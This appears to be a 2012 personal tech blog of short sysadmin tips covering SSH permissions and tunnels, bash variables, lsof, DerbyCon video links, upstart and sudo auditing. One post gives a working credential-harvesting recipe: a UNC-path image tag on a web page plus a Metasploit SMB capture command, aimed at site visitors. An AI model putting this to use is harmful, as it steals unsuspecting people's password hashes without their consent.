Thursday, November 29, 2012

SSH File Permissions

If your permissions on your SSH files are out of whack (i.e. id_rsa/config) than ssh will simply ignore using them out of security concerns. To fix permission issues you can run the following:


chmod 750 $HOME
chmod -R 700 $HOME/.ssh

This creates the strictest permissions for all the files under .ssh which will satisfy SSH's requirements for those files. SSH's recommendations and requirements (underlined) are below (from the manpage):

  • ~/.ssh/id_rsa (OR ANY PRIV KEY) - These files contain sensitive data and should be readable by the user but not accessible by others (read/write/execute).  ssh will simply ignore a private key file if it is accessible by others.
  • ~/.ssh/config - Because of the potential for abuse, this file must have strict permissions: read/write for the user, and not accessible by others.
  • ~/.ssh/authorized_keys - This file is not highly sensitive, but the recommended permissions are read/write for the user, and not accessible by others.
  • ~/.ssh/ - There is no general requirement to keep the entire contents of this directory secret, but the recommended permissions are read/write/execute for the user, and not accessible by others.
  • ~/.rhosts - Additionally, this file must be owned by the user, and must not have write permissions for anyone else.  The recommended permission for most machines is read/write for the user, and not acces- sible by others.
  • ~/.shosts - Same as rhosts
  • ~/.ssh/id_rsa.pub (OR ANY PUB KEY) - These files are not sensitive and can (but need not) be readable by anyone.
  • /etc/hosts.equivIt should only be writable by root
  • /etc/shosts.equiv - same as above
  • /etc/ssh/ssh_known_hosts - It should be world-readable

Bash Special/Reserved/Internal Variables

Bash can do a WHOLE LOT MORE than most people think. This is because there are a lot of bash features that people dont know about. Take it's special reserved variables for instance:

http://tldp.org/LDP/abs/html/internalvariables.html

You can make your bash scripts do some pretty complex stuff using some of those variables.

Reserved variables are also another reason its suggested NOT to have your variables be all in UPPERCASE, because you never know what you might accidentally use.

for instance:

cat -n file.txt | grep $LINENO #Wont work as expected
cat -n file.txt | grep $lineno #will work as expected

This is because $LINENO has a special meaning, it means the line number of current line its being called on.

so if the $LINENO variable is being called on line 15 of the script, it will ALWAYS grep the 15th line of file.txt. $lineno is lower case, and therefore a completely different variable, which is defined by you.

Wednesday, November 28, 2012

SSH Failover

You can have SSH iterate through a list of servers until it finds the one that works.
for i in $(cat servers.txt); do
if ssh -o ConnectTimeout=10 $i; then
echo "$i is the one that works"
fi
done
The ConnectTimeout option specifies that if it cant make a connection in the specified time, than it stops trying, and moves on to the next iteration. Otherwise you can wait the default of 45 seconds.

My suggestion is to have servers.txt file actually be the host entries in ~/.ssh/config :
my_vps
my_other_vps
my_vps2


Otherwise, just type out:

user@example.com
user1@internet.com
user@internet.com
etc...

Simpler SSH Tricks

So last time i said that basically you had to create a bunch of reverse port forwards to get that whole odd tunnel system to work. Well, you actually dont.

C still has to have a reverse tunnel to B, but on A all you have to do is create a local port forward. So, on A:
ssh -L $local_listen_port:localhost:$remote_listen_port $user@$B

now just:
 ssh -D localhost:$local_socks_port $user@localhost -p$local_listen_port 

Saturday, November 24, 2012

Stupid SSH Tricks - Securely jumping NATs

I have 3 machines - A,B,C.
A and C are two residential networks that are behind typical NAT routers.
B is a VPS on the internet.

My problem is that I'm at a friend's house, and i need to check my torrent downloads via a webserver on my home's internal network. How can i do this without actually exposing any listening ports to the internet?

So, basically I want to connect from A to C in order to browse several servers in C's network.

This is how to do it without opening any publicly listening ports. (the easy way is just to have C listen on a B's public interface, but that raises security concerns)

1. Have C create a remote port forward to a port on B's localhost
i.e (from C's terminal)
 ssh -R 6000:localhost:22 user@vps 

2. Have A create a remote port forward to a port on B's localhost
i.e (from A's terminal)

 ssh -R 6001:localhost:22 user@vps 

3. Have B create a remote port forward between A and C via the local ports
i.e (from B's terminal)
 ssh -R 6002:localhost:6000 localhost -p6001 

4. Have A setup a socks connection to the new local port listening on A
i.e (from A's terminal)
 ssh -D localhost:8080 localhost -p6002 

5. Point A's browser to use localhost:8080 as a socks proxy. This now will tunnel all the requests from that browser over the ssh tunnels to C's internal network.

My suggestion, is that you keep C always connected to B. This allows you to set up all the tunnels with one long command from A's terminal:

 ssh -R 6001:localhost:22 user@vps -t ssh -R 6002:localhost:6000 localhost -p6001 -t ssh -D localhost:8080 localhost -p6002

EDIT NOTE
Its important to note that you dont TECHNICALLY need to do that many reverse tunnels. 1 reverse tunnel from C to B, and then a local forward from A to B is really all thats needed. But, to each his own...

Friday, November 23, 2012

netstat -ntlup for OSX - Viewing open network connections

netstat -ntlup is a command i run often in linux to give me a quick run down of what is listening on what port. Unfortunately if you try to do that in OSX is pukes, and cries, and wants its mommy.
Enter lsof - one of the big boy binaries on the lot.
The following command will list all established and listening sockets open on your machine, sorted, along with the process name, the state, the source, and the destination. Needless to say, I like this command:

lsof -i | grep -E "(UDP|LISTEN|ESTABLISHED)" | awk '{print $10, $1, $8, $9}' | column -t | sort

Monday, November 19, 2012

Download DerbyCon 2012 Videos

DerbyCon videos are hosted for free at archive.org. I simply made it easier to download all of them. I suggest copying all of these into a file eg. day1, and grabbing them using "wget -i day1". that way you can walk away and come back a while later to watch them.

DAY 1:
http://archive.org/download/Derbycon2012Day1/111OpeningCeremony.avi
http://archive.org/download/Derbycon2012Day1/112HdMoore-TheWildWest.avi
http://archive.org/download/Derbycon2012Day1/113DanKaminsky-BlackOps.avi
http://archive.org/download/Derbycon2012Day1/114Mudge-CyberFastTrackFromTheTrenches.avi
http://archive.org/download/Derbycon2012Day1/115JaysonE.Street-SecuringTheInternetYoureDoingItWronganInfosecIntervention.avi
http://archive.org/download/Derbycon2012Day1/116RobFullerChrisGates-DirtyLittleSecretsPart2.avi
http://archive.org/download/Derbycon2012Day1/117IanAmit-Sexydefense-TheRedTeamToreYouANewOne.NowWhat.avi
http://archive.org/download/Derbycon2012Day1/118CarlosPerez-DnsReconnaissance.avi
http://archive.org/download/Derbycon2012Day1/211JasonScott-RescuingThePrinceOfPersiaFromTheSandsOfTime.avi
http://archive.org/download/Derbycon2012Day1/212ChrisHadnagy-NonverbalHumanHacking.avi
http://archive.org/download/Derbycon2012Day1/213Egyp7-PrivilegeEscalationWithTheMetasploitFramework.avi
http://archive.org/download/Derbycon2012Day1/214SamGaudetPentestingForNon-pentesters...ThroughVirtualMachines.avi
http://archive.org/download/Derbycon2012Day1/311DaveMarcus-2fa-enabledFraudDissectingOperationHighRoller.avi
http://archive.org/download/Derbycon2012Day1/312RickFarinaTheHackerEthosMeetsTheFossEthos.avi
http://archive.org/download/Derbycon2012Day1/313LarryPesceDarrenWigley-HackingSurvivalSo.YouWantToComputePost-apocalypse.avi
http://archive.org/download/Derbycon2012Day1/314RyanLinn-CollectingUnderpantsToWinYourNetwork.avi
http://archive.org/download/Derbycon2012Day1/411RafalLos-HouseOfCards.avi
http://archive.org/download/Derbycon2012Day1/412BrentHuston-InfoOverload..futureShock..IbmNatureOfModernCrime.avi
http://archive.org/download/Derbycon2012Day1/413JamesArlen-Doubt-Deceit-deficiencyAndDecency-ADecadeOfDisillusionment.avi
http://archive.org/download/Derbycon2012Day1/414JerryGamblinIsItTimeForAnotherFirewallOrASecurityAwarenessProgram.avi


DAY 2
http://archive.org/download/Derbycon2012Day2/121SkipDuckwallChrisCampbell-PuffPuffPass-GettingTheMostOutOfYourHash.avi
http://archive.org/download/Derbycon2012Day2/122JordanHarbinger-SocialEngineeringDefenseContractorsOnLinkedinAndFacebookWhosPluggedIntoYourEmployees.avi
http://archive.org/download/Derbycon2012Day2/123RandomShitPaulIsGoingToTalkAbout.avi
http://archive.org/download/Derbycon2012Day2/124ZackFasel-PwnedIn60Seconds-fromNetworkGuestToWindowsDomainAdmin.avi
http://archive.org/download/Derbycon2012Day2/125RyanElkins-SimpleSecurityDefenseToThwartAnArmyOfCyberNinjaWarriors.avi
http://archive.org/download/Derbycon2012Day2/126AtlasRfcat-subghzOrBust.avi
http://archive.org/download/Derbycon2012Day2/127GeorgiaWeidman-IntroducingTheSmartphonePentestFramework.avi
http://archive.org/download/Derbycon2012Day2/128GillisJones-TheBadminProject.avi
http://archive.org/download/Derbycon2012Day2/129KylekosOsborn-PhysicalDrive-byDownloads.avi
http://archive.org/download/Derbycon2012Day2/221JohnnyLong-TheEvolutionOfHfc.avi
http://archive.org/download/Derbycon2012Day2/222DualCoreint0x80-MoarAnti-forensics-MoarLouise.avi
http://archive.org/download/Derbycon2012Day2/223BrucePotter-SecurityEpistemologyBeliefs-Truth-AndKnowledgeInTheInfosecCommunity.avi
http://archive.org/download/Derbycon2012Day2/224JoshMore-PenTestingSecurityVendors.avi
http://archive.org/download/Derbycon2012Day2/225JasonGunnoeChrisCentore-buildingTheNextGenerationIdsWithOsint.avi
http://archive.org/download/Derbycon2012Day2/226BabakJavadiKeithHowell4140WaysYourAlarmSystemCanFail.avi
http://archive.org/download/Derbycon2012Day2/228BartHopper-HuntingEvil.avi
http://archive.org/download/Derbycon2012Day2/229DougBurks-SecurityOnion-NetworkSecurityMonitoringInMinutes.avi
http://archive.org/download/Derbycon2012Day2/321MichaelSchearer-FlexYourRightConstituionAndPoliticalActivismInTheHackerCommunity.avi
http://archive.org/download/Derbycon2012Day2/322EricSmithChrisGates-PenetrationTestingFromAHotTubTimeMachine.avi
http://archive.org/download/Derbycon2012Day2/323ChrisNickersonind303-TacticalSurveillanceLookAtMeNow.avi
http://archive.org/download/Derbycon2012Day2/324JamieMurdock-HowToCreateAOneManSoc.avi
http://archive.org/download/Derbycon2012Day2/325BrandenMillerBillGardner-BuildingAnAwarenessAndTrainingProgram.avi
http://archive.org/download/Derbycon2012Day2/326DanCrowleyChrisVinecombe-VulnerabilitySpideySense.avi
http://archive.org/download/Derbycon2012Day2/327NathanielHusted-EverythingYouAlwaysWantedToKnowAboutSecurityAcademiaButWereTooAfraidTooAsk.avi
http://archive.org/download/Derbycon2012Day2/328BillSempf-WhatLocksportCanTeachUsAboutSecurity.avi
http://archive.org/download/Derbycon2012Day2/329JpDunningTheGlitchHardwareWithHackingMadeEasy.avi
http://archive.org/download/Derbycon2012Day2/421ChristopherDomas-TheFutureOfReDynamicBinaryVisualization.avi
http://archive.org/download/Derbycon2012Day2/422TomEstonKevinJohnson-SocialZombiesRiseOfTheMobileDead.avi
http://archive.org/download/Derbycon2012Day2/423Kc.YerridMattJezorekBorisSverdlik-ItsNotYourPerimenter.ItsYou.avi
http://archive.org/download/Derbycon2012Day2/424DeralHeiland-formatStringVulnerabilities101.avi
http://archive.org/download/Derbycon2012Day2/425JackDaniel-HowScrewedAreWe.avi
http://archive.org/download/Derbycon2012Day2/426KellepCharlesSecurityVulnerablityAssessments.-ProcessAndBestPractices.avi
http://archive.org/download/Derbycon2012Day2/427JohnWoods-SoYouGotYourselfAnInfosecManagerJob.NowWhat.avi
http://archive.org/download/Derbycon2012Day2/428PersonalDarknets-KcHolland.avi
http://archive.org/download/Derbycon2012Day2/429TonyDelagrangeJasonWoodSh5arkAttack-TakingAByteOutOfHtml5.avi


DAY 3
http://archive.org/download/Derbycon2012Day3A/131MatthewSullivanCookieCadger-TakingCookieHijackingToANewLevel.avi
http://archive.org/download/Derbycon2012Day3A/131MatthewSullivanCookieCadger-TakingCookieHijackingToANewLevelA.avi
http://archive.org/download/Derbycon2012Day3A/132StevenHaywood-IntroductionToMetasploitPostExploitationModules.avi
http://archive.org/download/Derbycon2012Day3A/132StevenHaywood-IntroductionToMetasploitPostExploitationModulesA.avi
http://archive.org/download/Derbycon2012Day3A/133NoahBeddomeTheDevilsInTheDetails-aLookAtBadSeAndHowToDoBetter.avi
http://archive.org/download/Derbycon2012Day3A/134JayJamesShaneMacdougallUsineMcafeeSecureTrustguardAsAttackTools.avi
http://archive.org/download/Derbycon2012Day3A/135DeviantRoamer-AndroidPhoneRooting.avi
http://archive.org/download/Derbycon2012Day3A/136LaszloTothFerencSpalaThinkDifferentlyAboutDatabaseHacking.avi
http://archive.org/download/Derbycon2012Day3A/137ClosingCeremoniesPart1.avi
http://archive.org/download/Derbycon2012Day3A/137ClosingCeremoniesPart2.avi
http://archive.org/download/Derbycon2012Day3A/231MattWeeksAmbush-CatchingIntrudersAtAnyPoint.avi
http://archive.org/download/Derbycon2012Day3A/234MattPressonBuildingADatabaseSecurityProgram.avi
http://archive.org/download/Derbycon2012Day3A/235PatrickTatroWhyIsntEveryonePullingSecurity-ThisIsCombat.avi
http://archive.org/download/Derbycon2012Day3A/236MickDouglas-SprinklerIr.avi
http://archive.org/download/Derbycon2012Day3A/331JoshuaMarpetSeparatingSecurityIntelligenceFromSecurityFud.avi
http://archive.org/download/Derbycon2012Day3A/332RaphaelMudge.avi
http://archive.org/download/Derbycon2012Day3A/333NicolleNeulistWriteYourOwnToolsWithPython.avi
http://archive.org/download/Derbycon2012Day3A/334ChrisJenksIntroToLinuxSystemHardening.avi
http://archive.org/download/Derbycon2012Day3A/335JasonFrisvoldTamingStuxnet-usingTheCloudToAutomateBaselineScanning.avi
http://archive.org/download/Derbycon2012Day3A/336MatthewPerryCurrentTrendsInComputerLaw.avi
http://archive.org/download/Derbycon2012Day3A/431SteveWerbyRandyToddBuildingDictionariesAndDestroyingHashesWAmazonEc2.avi
http://archive.org/download/Derbycon2012Day3A/432DavidSchuetzdarthNull-SlowDownCowpoke-WhenEnthusiasmOutpacesCommonSense.avi
http://archive.org/download/Derbycon2012Day3A/433DavidMcguireMaturingThePenTestingProfessional.avi
http://archive.org/download/Derbycon2012Day3A/434EricMilamBecomingMallory.avi
http://archive.org/download/Derbycon2012Day3A/435JpDunningChrisSilversWieldingKatana-ALiveSecuritySuite.avi
http://archive.org/download/Derbycon2012Day3A/436LeonardIshamSeMe-SeYou.avi
http://archive.org/download/Derbycon2012Day3A/borisloop.avi

OSX Trash Bin Wont Empty

They mountain lion update for me has made my mac much worse. One of the issues i've found is that the trash bin wont finish emptying for some ungodly reason. It will just sit there, saying it has to delete like 2000 items and it will just never finish. Well, luckily there is an easy way to do it manually.

A user's trash bin is stored in their home directory, under "~/.Trash". All you have to do is go into that directory and just 'rm -rf' everything there. Or if you are paranoid about the hard drive sectors, you can always do a 'rm -rfP' which will overwrite the files 3 times before releasing the sections as free.

TL;DR

rm -rfP ~/.Trash/*

Monday, November 12, 2012

Capturing SMB hashes over the internet

I like leaving this enabled on my VPS just for fun sometimes. You can capture people's SMB hashes remotely using a UNC path to reference resources. So when your browser loads my page, it sees the resource that it thinks exists on some SMB server somewhere, and IE will automatically throw its credentials at it. IE does this for a "seamless user experience". Well, luckily that means for us a "seamless user pwn".
So on your VPS, modify index.html at the root of your web server to include this:
<img src="\\72.14.182.123\cats.gif" />
and then run as root:
msfcli auxiliary/server/capture/smb JOHNPWFILE='/root/testsmbcapturefile' E

Friday, November 9, 2012

Disabling upstart jobs

Have you used rcconf/chkconfig to disable services from booting up? have you even checked the correct rc directory to see if it starts with a "K" vs a "S" and services are still booting up? You should probably check if the service/daemon was converted to an upstart job.

System upstart jobs are found in /etc/init/

the simplest way to disable the service from starting is to rename it. So, for example the service "smbd" would be stopped from starting like this:

mv /etc/init/smbd.conf /etc/init/smbd.conf.disabled

This way, you can keep the original configuration file and it will be plainly noticed that its "disabled"

Thursday, November 1, 2012

Show who ran that sudo command

When you have a server used by many people its often understood that you should be considerate when running certain programs or if you plan on utilizing lots of CPU. Sometimes that consideration flys out the window. When that happens i like to track down who the douchebag is. Here are some ways you can find out the person.

PSTREE
pstree -aUhu
run that command and you will see a pretty tree being drawn to your terminal. reading through the output will show you the commands, their arguments, what process is the parent, and if the user changed. This command has yet to fail me in determining process ownership.

PROC
/proc/PID/environ
grab the PID of the process that is in question using either 'pidof' or just copying it out of 'ps aux'. Once you have the PID, cat the file above (while replacing "PID" with the copied PID) and it will output the enherited environment variables of the process, which includes the "SUDO_USER=jim" variable.